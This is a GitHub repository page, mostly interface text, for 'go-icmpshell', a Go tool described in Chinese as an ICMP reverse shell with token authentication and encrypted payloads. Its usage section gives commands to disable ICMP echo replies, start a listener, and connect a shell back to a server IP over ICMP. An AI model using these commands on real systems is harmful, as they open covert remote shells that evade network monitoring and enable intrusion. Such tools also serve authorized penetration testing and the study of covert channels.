Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

d1nfinite/go-icmpshell

Open more actions menu

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
4 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

go-icmpshell

一款基于 gopacket 编写的 ICMP 反弹 shell 工具

Features

  • 支持自定义 ICMP 通信 id
  • 基于 token 进行协商认证
  • 针对传输载荷进行有效加密

Usage

Server 端禁用 ICMP 自动 Reply

echo "1" >  /proc/sys/net/ipv4/icmp_echo_ignore_all

Server 端启动监听

./server --token [secret]

Shell 端通过 ICMP 反弹 Shell

./shell --token [secret] --ip [server_ip_address]

About

一款基于 gopacket 编写的 ICMP 反弹 shell 工具

Topics

Resources

Stars

Watchers

Forks

Packages

 
 
 

Contributors

Languages

Morty Proxy This is a proxified and sanitized view of the page, visit original site.